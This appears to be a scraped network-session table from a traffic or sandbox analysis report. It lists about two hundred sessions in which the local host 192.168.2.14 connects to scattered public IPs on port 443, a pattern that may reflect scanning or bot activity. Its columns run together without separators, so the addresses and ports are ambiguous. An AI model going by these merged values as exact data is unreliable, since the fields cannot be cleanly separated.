                                                        20400192.168.2.144072237.91.146.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20401192.168.2.1446682182.41.80.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20402192.168.2.1451986126.108.157.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20403192.168.2.145880093.189.67.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20404192.168.2.144140267.73.85.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20405192.168.2.1435634129.135.36.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20406192.168.2.146092050.80.6.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20407192.168.2.144896475.116.206.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20408192.168.2.1456256158.103.121.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20409192.168.2.144581627.223.77.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20410192.168.2.145580613.241.190.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20411192.168.2.1439012205.228.13.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20412192.168.2.1444428123.155.134.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20413192.168.2.1435266100.5.77.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20414192.168.2.1442138141.28.239.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20415192.168.2.14450444.115.212.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20416192.168.2.144315848.151.124.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20417192.168.2.1455310104.77.21.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20418192.168.2.1448634190.176.122.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20419192.168.2.1436006128.44.67.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20420192.168.2.145250225.27.60.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20421192.168.2.145677899.58.66.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20422192.168.2.1450650217.89.113.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20423192.168.2.1446412196.217.242.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20424192.168.2.143508482.174.127.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20425192.168.2.1435806136.70.38.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20426192.168.2.1440886221.202.232.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20427192.168.2.1449674155.149.32.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20428192.168.2.1448534147.187.248.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20429192.168.2.146010880.16.3.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20430192.168.2.1437040170.232.80.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20431192.168.2.1447678180.35.53.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20432192.168.2.145467447.33.246.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20433192.168.2.145824658.25.136.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20434192.168.2.1460824125.13.177.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20435192.168.2.1449554188.2.62.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20436192.168.2.1452554157.195.152.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20437192.168.2.145035872.211.157.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20438192.168.2.143969688.232.239.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20439192.168.2.1444346191.154.48.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20440192.168.2.145827851.50.16.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20441192.168.2.1440944141.150.102.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20442192.168.2.1435124203.108.96.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20443192.168.2.1433974140.96.173.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20444192.168.2.1438364171.99.17.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20445192.168.2.143460673.102.233.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20446192.168.2.145899097.69.100.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20447192.168.2.143531039.186.155.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20448192.168.2.145966247.161.170.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20449192.168.2.1442958119.74.17.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20450192.168.2.1447526144.98.199.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20451192.168.2.1455568122.90.192.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20452192.168.2.143640254.116.137.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20453192.168.2.1444440157.47.166.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20454192.168.2.144928827.104.44.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20455192.168.2.1459468189.178.128.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20456192.168.2.1451642153.160.232.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20457192.168.2.144271074.109.200.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20458192.168.2.146016885.152.113.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20459192.168.2.143484227.143.135.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20460192.168.2.1457728196.115.83.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20461192.168.2.144965490.163.90.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20462192.168.2.1459906102.99.27.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20463192.168.2.1455266209.1.131.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20464192.168.2.14551902.164.191.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20465192.168.2.14344724.167.71.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20466192.168.2.1433282119.110.73.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20467192.168.2.145384639.24.134.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20468192.168.2.1448034125.123.4.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20469192.168.2.143963012.210.73.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20470192.168.2.144500835.177.71.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20471192.168.2.1460460196.84.113.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20472192.168.2.1444578168.71.170.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20473192.168.2.1435772171.73.92.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20474192.168.2.144046819.160.11.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20475192.168.2.1452694134.70.104.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20476192.168.2.1439588218.228.45.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20477192.168.2.1454140124.23.191.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20478192.168.2.1437988219.136.106.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20479192.168.2.1456512207.33.118.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20480192.168.2.1434552116.80.219.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20481192.168.2.1456536193.136.196.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20482192.168.2.1452084174.250.202.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20483192.168.2.145823846.209.113.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20484192.168.2.1452560136.143.199.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20485192.168.2.1454036205.168.244.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20486192.168.2.145022864.104.241.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20487192.168.2.1444370100.197.135.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20488192.168.2.146059448.222.201.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20489192.168.2.1447084202.123.183.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20490192.168.2.1434284174.146.238.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20491192.168.2.145772063.131.240.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20492192.168.2.1448060145.5.220.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20493192.168.2.145065096.241.130.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20494192.168.2.145174289.209.228.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20495192.168.2.1458148202.58.92.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20496192.168.2.1454276130.159.128.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20497192.168.2.1434656128.89.178.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20498192.168.2.1448304220.59.100.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20499192.168.2.145179091.171.179.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20500192.168.2.1458202114.96.129.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20501192.168.2.1449462118.35.133.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20502192.168.2.144283438.115.56.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20503192.168.2.1451802165.162.174.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20504192.168.2.1449246190.82.83.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20505192.168.2.1455996186.238.100.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20506192.168.2.145950266.250.19.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20507192.168.2.1433170164.24.99.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20508192.168.2.144985243.243.141.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20509192.168.2.1441872106.243.243.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20510192.168.2.1458346174.29.71.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20511192.168.2.143374651.154.159.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20512192.168.2.1447224121.147.213.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20513192.168.2.1438694116.200.134.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20514192.168.2.1458174183.177.107.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20515192.168.2.1439186200.64.136.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20516192.168.2.1439556141.97.253.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20517192.168.2.1441666168.241.142.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20518192.168.2.146099849.111.10.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20519192.168.2.143926080.105.194.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20520192.168.2.1440664166.57.229.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20521192.168.2.1436686181.78.255.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20522192.168.2.1456822170.217.121.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20523192.168.2.144185086.114.141.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20524192.168.2.144640476.84.242.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20525192.168.2.1448188142.171.5.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20526192.168.2.1441744176.134.34.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20527192.168.2.1449730220.202.47.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20528192.168.2.14507002.71.237.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20529192.168.2.1442408112.22.237.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20530192.168.2.1451076217.246.151.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20531192.168.2.1454196120.150.113.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20532192.168.2.1453140123.172.40.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20533192.168.2.1435262132.34.123.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20534192.168.2.1453614137.58.23.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20535192.168.2.1458804152.83.135.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20536192.168.2.1439820150.28.245.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20537192.168.2.1448928189.226.201.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20538192.168.2.1432896132.140.252.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20539192.168.2.1445276160.126.139.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20540192.168.2.1442058166.8.131.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20541192.168.2.145215443.254.150.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20542192.168.2.1441898221.68.108.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20543192.168.2.1449032206.119.210.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20544192.168.2.1442022139.206.104.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20545192.168.2.1457364158.220.220.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20546192.168.2.144205261.4.153.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20547192.168.2.1458640124.199.182.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20548192.168.2.146018038.184.51.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20549192.168.2.145543841.59.0.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20550192.168.2.144017241.225.194.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20551192.168.2.1457148144.63.132.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20552192.168.2.1451676174.97.130.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20553192.168.2.143681084.96.102.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20554192.168.2.1448480174.150.143.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20555192.168.2.144444866.97.130.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20556192.168.2.145459240.225.19.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20557192.168.2.144149840.97.214.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20558192.168.2.1447950205.209.161.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20559192.168.2.144411496.181.180.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20560192.168.2.144298220.32.39.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20561192.168.2.1459078211.244.130.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20562192.168.2.1457800194.75.52.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20563192.168.2.143474691.59.119.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20564192.168.2.1460844111.184.90.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20565192.168.2.144177669.67.175.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20566192.168.2.143995877.208.195.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20567192.168.2.14498244.182.94.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20568192.168.2.1440348163.116.151.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20569192.168.2.1440770217.216.168.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20570192.168.2.1452516110.144.216.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20571192.168.2.145077492.26.219.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20572192.168.2.1447108167.5.57.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20573192.168.2.145989843.239.150.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20574192.168.2.1460022208.83.191.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20575192.168.2.1438300103.66.186.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20576192.168.2.145769423.60.153.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20577192.168.2.144221425.45.29.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20578192.168.2.144009644.110.105.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20579192.168.2.1450022152.138.11.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20580192.168.2.145024214.32.199.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20581192.168.2.145577281.97.118.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20582192.168.2.146082225.122.19.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20583192.168.2.144924874.163.239.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20584192.168.2.146024074.29.94.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20585192.168.2.143652242.238.134.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20586192.168.2.1449396154.74.77.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20587192.168.2.144489471.244.41.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20588192.168.2.144627862.98.159.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20589192.168.2.1441064202.121.51.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20590192.168.2.143503638.92.174.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20591192.168.2.1449250115.255.28.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20592192.168.2.144737485.232.134.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20593192.168.2.144827091.90.152.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20594192.168.2.143641623.49.12.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20595192.168.2.146064635.110.168.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20596192.168.2.1455602121.1.199.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20597192.168.2.1457558112.208.60.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20598192.168.2.143765877.147.173.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20599192.168.2.1437178174.194.153.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20600192.168.2.1439508149.15.16.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20601192.168.2.1448934195.159.190.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20602192.168.2.1443138169.140.112.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20603192.168.2.1457850111.111.225.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20604192.168.2.143515491.236.128.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20605192.168.2.144331631.13.89.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20606192.168.2.1438526136.58.29.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20607192.168.2.1457380135.253.109.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20608192.168.2.14543829.22.100.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20609192.168.2.1451522116.204.163.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20610192.168.2.144997697.192.28.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20611192.168.2.1458790199.72.234.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20612192.168.2.1441708182.2.101.199443
